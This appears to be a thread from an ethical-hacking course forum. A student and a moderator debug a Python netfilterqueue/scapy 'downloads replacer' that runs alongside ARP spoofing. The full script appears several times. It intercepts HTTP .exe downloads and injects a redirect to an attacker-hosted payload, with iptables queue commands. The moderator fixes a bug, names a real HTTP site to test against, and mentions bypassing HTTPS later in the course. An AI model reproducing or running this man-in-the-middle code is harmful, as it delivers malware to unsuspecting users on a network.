- This topic has 16 replies, 2 voices, and was last updated 4 years, 6 months ago by Diego Pérez.
- AuthorPosts
- June 1, 2020 at 4:41 pm #38763AlastairParticipant
Good afternoon,
I’ve just completed the section for the downloads re-placer however when I run the programme it Isn’t doing anything. I’ve checked my code and compared it to yours and it seems okay. I’ve ran the iptables command and the echo command but nothing happens. I’ve tried it on the local machine and on a windows VM but no success.I am running the ARP spoofer in the background, as well as Apache server.
any help would be greatly appreciated.
June 2, 2020 at 4:47 am #38804Diego PérezModeratorHi Alastair!
First it has to work in local host.
Can you share your code please? And the iptables rules used in this case?Thanks!
DiegoJune 2, 2020 at 8:44 am #38829AlastairParticipanthello Diego, here is my code. i used the output and input rules for local machine and the forward rule for the windows vm
#!/usr/bin/env python
# run >> iptables -I FORWARD -j NFQUEUE –queue-num 0
# run >> iptables -I OUTPUT -j NFQUEUE –queue-num 0
# run >> iptables -I INPUT -j NFQUEUE –queue-num 0
# reset with >> iptables –flushimport netfilterqueue
import scapy.all as scapyack_list = []
def set_load(packet, load):
packet[scapy.Raw].load = load
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.TCP].chksum
return packetdef process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
if scapy_packet[scapy.TCP].dport == 80:
if “.exe” in scapy_packet[scapy.Raw].load:
print(“[+] exe Request”)
ack_list.append(scapy_packet[scapy.TCP].ack)
elif scapy_packet[scapy.TCP].sport == 80:
if scapy_packet[scapy.TCP].seq in ack_list:
ack_list.remove(scapy[scapy.TCP].seq)
print(“[+] Replacing file”)
modified_packet = set_load(scapy_packet, “HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.2.4/Evil-files/today.exe\n\n”)packet.set_payload(str(modified_packet))
packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()June 3, 2020 at 5:18 am #38915Diego PérezModeratorHi!
Thanks, but can you share it using identation? Use the CODE buttonFor testing locally which sites are you using?
Let me know.
DiegoJune 3, 2020 at 8:18 am #38929AlastairParticipantapologies, hope this is better. I was using bing.com via firefox
`#!/usr/bin/env python
# run >> iptables -I FORWARD -j NFQUEUE –queue-num 0
# run >> iptables -I OUTPUT -j NFQUEUE –queue-num 0
# run >> iptables -I INPUT -j NFQUEUE –queue-num 0
# reset with >> iptables –flushimport netfilterqueue
import scapy.all as scapyack_list = []
def set_load(packet, load):
packet[scapy.Raw].load = load
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.TCP].chksum
return packetdef process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
if scapy_packet[scapy.TCP].dport == 80:
if “.exe” in scapy_packet[scapy.Raw].load:
print(“[+] exe Request”)
ack_list.append(scapy_packet[scapy.TCP].ack)
elif scapy_packet[scapy.TCP].sport == 80:
if scapy_packet[scapy.TCP].seq in ack_list:
ack_list.remove(scapy[scapy.TCP].seq)
print(“[+] Replacing file”)
modified_packet = set_load(scapy_packet, “HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.2.4/Evil-files/today.exe\n\n”)packet.set_payload(str(modified_packet))
packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()June 4, 2020 at 5:32 am #38993Diego PérezModeratorHi!
As you can see you shared again with out identation, once you’ve pasted yous code select it and click th CODE button.And for your testing sites please use a different one, a http site cause,first, Bing uses hsts protection and second Bing doesn’t provided any .exe to download from it. So please use a http site where you can download an .exe file.
Later on the course you’ll learn to bypass https protection.Let me know how it goes!
DiegoJune 4, 2020 at 8:53 am #39007AlastairParticipant3rd time lucky. sorry i was getting muddled, my code injector programme isnt responding either and i used bing for that one. i have tried the downloads replacer on winzip
#!/usr/bin/env python # run >> iptables -I FORWARD -j NFQUEUE --queue-num 0 # run >> iptables -I OUTPUT -j NFQUEUE --queue-num 0 # run >> iptables -I INPUT -j NFQUEUE --queue-num 0 # reset with >> iptables --flush import netfilterqueue import scapy.all as scapy ack_list = [] def set_load(packet, load): packet[scapy.Raw].load = load del packet[scapy.IP].len del packet[scapy.IP].chksum del packet[scapy.TCP].chksum return packet def process_packet(packet): scapy_packet = scapy.IP(packet.get_payload()) if scapy_packet.haslayer(scapy.Raw): if scapy_packet[scapy.TCP].dport == 80: if ".exe" in scapy_packet[scapy.Raw].load: print("[+] exe Request") ack_list.append(scapy_packet[scapy.TCP].ack) elif scapy_packet[scapy.TCP].sport == 80: if scapy_packet[scapy.TCP].seq in ack_list: ack_list.remove(scapy[scapy.TCP].seq) print("[+] Replacing file") modified_packet = set_load(scapy_packet, "HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.2.4/Evil-files/today.exe\n\n") packet.set_payload(str(modified_packet)) packet.accept() queue = netfilterqueue.NetfilterQueue() queue.bind(0, process_packet) queue.run()
June 4, 2020 at 9:19 am #39009AlastairParticipantIf this help i get this error when i try and run the programme:
Exception IndexError: IndexError(‘Layer [TCP] not found’,) in ‘netfilterqueue.global_callback’ ignored
June 5, 2020 at 5:17 am #39094Diego PérezModeratorHi!
Thanks! Your code looks ok.Is the same case for winzip, it is a https site, please try it with:
http://www.diabeticretinopathy.org.uk/exeforlaptops.html
It’s not like the most fancy site but it works for testing.
Let me know how it goes!
DiegoJune 8, 2020 at 11:08 am #39401AlastairParticipantgood morning,
unfortunately running it against the suggested website had no effect. once i run the two commands for iptables (input,output) and then run the downloads replacer via python my screen just fills up with repeated error maessages:
Exception IndexError: IndexError(‘Layer [TCP] not found’,) in ‘netfilterqueue.global_callback’ ignored
Exception IndexError: IndexError(‘Layer [TCP] not found’,) in ‘netfilterqueue.global_callback’ ignoredI also lose internet connection, i have run the echo 1 …. command but this has no effect
June 9, 2020 at 6:41 am #39503Diego PérezModeratorHi Alastair!
I’ve checked your code once again and I found an error, in line:
ack_list.remove(scapy[scapy.TCP].seq)
You are missing the proper name of the packet which is scapy_packet, so it should be like:
ack_list.remove(scapy_packet[scapy.TCP].seq)
Change it and let me know how it goes!
DiegoJune 11, 2020 at 10:07 am #39660AlastairParticipanthello Diego,
I’ve corrected the code however it still runs with the same error as before:
Exception IndexError: IndexError(‘Layer [TCP] not found’,) in ‘netfilterqueue.global_callback’ ignored
I’ve also noticed that when i run :
iptables -I OUTPUT -j NFQUEUE –queue-num 0
iptables -I INPUT -j NFQUEUE –queue-num 0I lose my internet connection and nothing loads
June 12, 2020 at 4:53 am #39735Diego PérezModeratorHi!
Yeah, that’s normal (lossing internet) cause all the packets are being sent to queue 0 and if there’s no script using it they won’t be redirected properly, just flush iptables when you’re done.Can you share your corrected code again? Also share a screenshot of the error? I want to see where is it exactly ocurring based on the prints you have in your code.
Let me know.
DiegoJune 12, 2020 at 9:01 am #39749AlastairParticipanthello Diego,
#!/usr/bin/env python # run >> iptables -I FORWARD -j NFQUEUE --queue-num 0 # run >> iptables -I OUTPUT -j NFQUEUE --queue-num 0 # run >> iptables -I INPUT -j NFQUEUE --queue-num 0 # reset with >> iptables --flush import netfilterqueue import scapy.all as scapy ack_list = [] def set_load(packet, load): packet[scapy.Raw].load = load del packet[scapy.IP].len del packet[scapy.IP].chksum del packet[scapy.TCP].chksum return packet def process_packet(packet): scapy_packet = scapy.IP(packet.get_payload()) if scapy_packet.haslayer(scapy.Raw): if scapy_packet[scapy.TCP].dport == 80: if ".exe" in scapy_packet[scapy.Raw].load: print("[+] exe Request") ack_list.append(scapy_packet[scapy.TCP].ack) elif scapy_packet[scapy.TCP].sport == 80: if scapy_packet[scapy.TCP].seq in ack_list: ack_list.remove(scapy_packet[scapy.TCP].seq) print("[+] Replacing file") modified_packet = set_load(scapy_packet, "HTTP/1.1 301 Moved Permanently\nLocation: http://192.168.1.46/Files/Payload.exe\n\n") packet.set_payload(str(modified_packet)) packet.accept() queue = netfilterqueue.NetfilterQueue() queue.bind(0, process_packet) queue.run()
link to screenshot:
https://1drv.ms/u/s!Amebr6-UtXCwjD4SQTE2wZsrwdwv
thanks
June 13, 2020 at 4:07 am #39839Diego PérezModeratorHi!
Are you still trying with the site I suggested or are you using a different one?
Also I don’t know if it’s gonna work in official kali release as it has many bugs related to networking. I’ll suggest to use custom kali and see if you get the same result.Let me know how it goes!
Diego - AuthorPosts
- You must be logged in to reply to this topic.